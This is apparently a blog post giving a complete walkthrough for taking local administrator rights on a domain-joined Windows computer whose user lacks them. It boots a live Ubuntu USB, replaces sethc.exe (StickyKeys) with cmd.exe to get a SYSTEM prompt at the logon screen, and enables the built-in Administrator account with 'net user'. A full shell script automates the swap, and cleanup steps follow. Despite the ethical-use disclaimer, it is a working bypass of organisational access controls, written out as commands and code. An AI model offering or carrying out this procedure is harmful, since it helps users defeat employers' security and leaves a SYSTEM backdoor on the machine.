Monday, August 18, 2014

A Specific and Detailed Guide to Gaining Local Admin Access on a Windows Domain Computer

Note: Please use this guide only for legal/ethical purposes (e.g. system recovery). The "hack" tag is to attract search results away from damaging and dangerous procedures. This guide is easy, safe, and reversible.

So, let's say you're using a computer (probably a laptop) joined to a domain on which you do not have administrative rights, but you want to be a local administrator to install programs and whatnot. This guide walks you through every step of doing so.

I am assuming you have these:
  • A different computer on which you have local admin
  • A USB flash drive of decent size, formatted FAT32
  • Access to a USB port on the computer
  • A contract that won't be violated when you do this
  • Ability to boot from an alternate device (a firmware password that locks the boot order defeats this, and so does full-disk encryption such as BitLocker, since the Windows volume would then be unreadable from the live system)
On a computer on which you are already an admin, go to Pen Drive Linux's web page for the USB installer. Press the big "Download UUI" button near the bottom of the page. Run the resulting application and accept the UAC prompt. Press "I Agree" after not reading the license terms. In the application, do this:
  1. Select "Ubuntu" from the Step 1 list.
  2. Check the "Download Link" box and press "Yes".
  3. Wait for the download to finish.
  4. Click Step 2's Browse button and choose the downloaded ISO.
  5. Select your USB flash drive from the Step 3 list.
    • If it doesn't appear, check "Show all Drives" and press "Yes".
  6. Check the box to format the drive if you have a lot of junk on it.
  7. Set the Step 4 slider to 0 MB.
  8. Press Create.
Once the process finishes, eject the USB drive and use it to boot up the computer on which you wish to gain local admin. (If it doesn't boot into Ubuntu, you need to change the boot order in the firmware (BIOS/UEFI) setup and turn off anything that blocks booting from USB. Unfortunately, there are many different firmware setups, so I cannot document the process for each.) Once it loads, choose your language and press the button to just try Ubuntu, not install it.

Disclaimer: I am not good at operating Linux and this may not be the most efficient way of accomplishing the task. It works, though.

Click Activities in the upper-left and choose Files (near the bottom of the resulting bar). In the sidebar, choose the volume holding the normal Windows installation and navigate to Windows\System32. (Navigation is very similar to that in Windows Explorer.) Two things can stop you here: if the disk is BitLocker-encrypted, the Windows volume will not be readable from the live session at all, and if Windows was hibernated or shut down with Fast Startup enabled, Ubuntu mounts the volume read-only and the renames below will fail; in the second case, boot Windows, do a full shutdown (hold Shift while clicking Shut down), and come back. Find sethc.exe in the list; this is the program that runs when you press Shift five times (the ever-annoying StickyKeys). Rename it, for example to sethc_.exe; that renamed file is your backup of the original. Find cmd.exe in the list, right-click it, and choose Copy To, putting the copy in the containing directory, Windows. Move up to find the copy we just made and rename it to sethc.exe by right-clicking it and choosing Rename. Right-click that and choose Move To, selecting the System32 directory.

You have just replaced the StickyKeys handler with the Command Prompt. At the logon screen, Winlogon launches this program as the LocalSystem account (NT AUTHORITY\SYSTEM), before anyone has logged on, which is why the prompt it opens can reset local accounts and change group memberships.
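The sethc.exe swap described above, as an added example that is not part of the original post: a shell script for the terminal of the Ubuntu live session that performs the same rename and copy, keeps a hash-verified backup, refuses to run twice, checks that the NTFS volume is actually writable, and can put the original back. The script name and the WINDIR argument (the mounted volume's Windows directory, typically under /media/<user>/<volume name> once you have opened it in Files) are assumptions.

```shell
#!/bin/bash
# Added example, not code from the original post: a reversible, checked version of the
# sethc.exe swap for the Ubuntu live session's terminal.
# Assumptions: the Windows volume is already mounted read-write (Files mounts it under
# /media/$USER/<volume name>), and WINDIR is the path of its Windows directory.
set -eu

BACKUP_NAME="sethc_.exe"        # same backup name the post uses
STAMP_NAME=".sethc_orig.sha256" # hash of the untouched sethc.exe, kept beside the backup

file_sha() { sha256sum "$1" | cut -d' ' -f1; }

# Shared checks: is this really a Windows directory, and is the volume writable?
# ntfs-3g falls back to a read-only mount when Windows was hibernated or shut down
# with Fast Startup, which would make the rename below fail halfway.
check_sys32() {
  local sys32="$1/System32"
  [ -f "$sys32/sethc.exe" ] && [ -f "$sys32/cmd.exe" ] \
    || { echo "no sethc.exe/cmd.exe under $sys32; wrong path?" >&2; return 1; }
  if ! touch "$sys32/.rwtest" 2>/dev/null; then
    echo "$sys32 is read-only; fully shut Windows down (no hibernation) and retry" >&2
    return 1
  fi
  rm -f "$sys32/.rwtest"
}

# What currently sits at sethc.exe: "original", "swapped" (our cmd.exe copy) or "unknown".
sethc_status() {
  local sys32="$1/System32"
  [ -f "$sys32/sethc.exe" ] && [ -f "$sys32/cmd.exe" ] || { echo unknown; return 0; }
  if [ "$(file_sha "$sys32/sethc.exe")" = "$(file_sha "$sys32/cmd.exe")" ]; then
    echo swapped
  elif [ -e "$sys32/$BACKUP_NAME" ] || [ -e "$sys32/$STAMP_NAME" ]; then
    echo unknown   # a backup exists but sethc.exe is not our copy: something else changed it
  else
    echo original
  fi
}

# Rename sethc.exe to the backup name, record its hash, copy cmd.exe into its place.
sethc_install() {
  local win="$1" sys32="$1/System32"
  check_sys32 "$win" || return 1
  [ "$(sethc_status "$win")" = original ] \
    || { echo "sethc.exe is already replaced or unrecognised; not touching it" >&2; return 1; }
  file_sha "$sys32/sethc.exe" > "$sys32/$STAMP_NAME"
  mv "$sys32/sethc.exe" "$sys32/$BACKUP_NAME"
  cp "$sys32/cmd.exe" "$sys32/sethc.exe"
  echo "sethc.exe now runs cmd.exe; original kept as $BACKUP_NAME"
}

# Put the original back, but only if sethc.exe is still our cmd.exe copy and the
# backup still hashes to what we recorded, so nothing unexpected gets deleted.
sethc_restore() {
  local win="$1" sys32="$1/System32"
  check_sys32 "$win" || return 1
  [ "$(sethc_status "$win")" = swapped ] \
    || { echo "sethc.exe is not our cmd.exe copy; refusing to delete it" >&2; return 1; }
  [ -f "$sys32/$BACKUP_NAME" ] && [ -f "$sys32/$STAMP_NAME" ] \
    || { echo "backup or hash record missing; restore by hand" >&2; return 1; }
  [ "$(file_sha "$sys32/$BACKUP_NAME")" = "$(cat "$sys32/$STAMP_NAME")" ] \
    || { echo "$BACKUP_NAME does not match the recorded hash; not restoring it" >&2; return 1; }
  mv -f "$sys32/$BACKUP_NAME" "$sys32/sethc.exe"
  rm -f "$sys32/$STAMP_NAME"
  echo "original sethc.exe restored"
}

# Command-line use: sethc_swap.sh install|restore|status WINDIR
if [ $# -eq 2 ]; then
  case "$1" in
    install) sethc_install "$2" ;;
    restore) sethc_restore "$2" ;;
    status)  sethc_status  "$2" ;;
    *) echo "usage: $0 install|restore|status WINDIR" >&2; exit 2 ;;
  esac
fi
```

Run it as sethc_swap.sh install /media/<user>/<volume>/Windows, confirm with the status subcommand, and when you are done boot the live USB again and run restore; that avoids fighting NTFS ownership from inside Windows, and the hash check means a backup that has been altered in the meantime is never copied back over the system file.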

Shut down Ubuntu using the power icon in the upper-right corner. Remove your flash drive and boot back into Windows. At the logon screen, press the Shift key five times to produce the Command Prompt. There, type the following command to set the built-in Administrator account's password and enable it (the account is disabled by default on Vista and later, which is what /ACTIVE:YES fixes); replace wow_suchpassword with a password of your choosing:

net user Administrator wow_suchpassword /ACTIVE:YES

Close the Command Prompt and log in using that local account. You will have to know your computer's name, which can be found in the convenient help link "How do I log on to another domain?". If your computer's name was Fleex255, you would use "Fleex255\Administrator" as the username (".\Administrator" also works, since a dot stands for the local computer). Enter the password you set in the previous step.

Once you're into that account, you own the machine! To elevate your normal user account, follow these steps:
  1. Open Control Panel in Category view.
  2. Choose Administrative Tools.
  3. Choose Computer Management.
  4. On the left in the resulting window, choose Local Users and Groups.
  5. Enter the Groups folder.
  6. Open the Administrators entry.
  7. Click Add in the resulting dialog.
  8. Enter your domain username in the form DOMAIN\username and click OK.
  9. When prompted, enter your domain username and password; the local Administrator account is not a domain account, so Windows needs domain credentials to look your user up.
  10. Click OK to close Administrators Properties.
  11. Log off of the Administrator account.
  12. Log into your normal domain account as usual.
Congratulations! You are now a full-power administrator of your realm, your local computer. Soon afterwards, change the Administrator password to something better (or disable the account again with net user Administrator /ACTIVE:NO) and use your new admin powers to put the real sethc.exe back: delete the cmd.exe copy and rename sethc_.exe to sethc.exe. Files in System32 are owned by TrustedInstaller, so even as an administrator you first have to take ownership and grant yourself access, for example takeown /f C:\Windows\System32\sethc.exe followed by icacls C:\Windows\System32\sethc.exe /grant Administrators:F from an elevated prompt; alternatively, sfc /scannow replaces modified protected system files with known-good copies. (Or just go into Linux again if you don't want to jump through the hoops of NTFS ACLs.) Don't leave the swap in place: a cmd.exe sitting where an accessibility binary belongs is a well-known trick that antivirus scanners flag, and it leaves a SYSTEM shell one keypress away from anyone who reaches the logon screen.

Disclaimer: This is not guaranteed to work forever. In fact, it's not even guaranteed to work now. I am not responsible for the consequences if you use this, don't use this, or use it incorrectly.
